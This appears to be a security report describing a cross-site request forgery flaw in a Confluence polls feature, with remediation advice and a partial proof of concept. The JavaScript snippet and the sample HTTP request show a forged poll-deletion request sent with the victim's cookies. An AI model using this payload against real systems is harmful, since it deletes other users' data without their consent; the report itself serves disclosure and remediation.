Polls Security Vulnerabilities Reported


Issue #1

Title: Poll Delete Cross-Site Request Forgery
Reported By: Shaun Colley
Severity: Moderate

1. Description

The tester found that, because the poll deletion endpoint has no anti-XSRF defences, a cross-site request forgery attack could delete an entire poll on behalf of the victim user (i.e. the poll creator).

This could be viewed as a relatively low-impact issue, but successful exploitation could cause unintended disruption and lead to a variety of problems affecting delivery and/or relations. For example, an attacker could delete an important poll via XSRF, leading to a "no result" and slowing down team progress.

Note that the POST request used to cast poll votes carries a token named 'atl_token', but setting it to an obviously invalid value had no effect: the system still processed the vote. This field is therefore either intended for a purpose other than anti-XSRF protection, or any intended anti-XSRF protection is disabled or simply does not work.

2. Remediation

Carry out anti-XSRF token validation on all requests that result in a state change.

3. Proof of Concept

Cross-site request forgery attacks to delete a poll on a 'victim' user's behalf may be carried out using JavaScript similar to the following (the remainder of the handler and the request body are omitted in the report):

```javascript
var xhr = new XMLHttpRequest();
xhr.open("POST", 'https://confluence-beta.sd.apple.com/polls/doremovepoll.action', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
// Send the victim's session cookies with the cross-origin request.
xhr.withCredentials = true;

xhr.onreadystatechange = function() { // Call a function when the state changes.
  if (xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) {
    // blah blah
  }
};
```

Resulting in a request similar to:

```http
POST /polls/doremovepoll.action HTTP/1.1
Host: confluence-beta.sd.apple.com
Connection: keep-alive
Content-Length: 61
Origin: null
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
```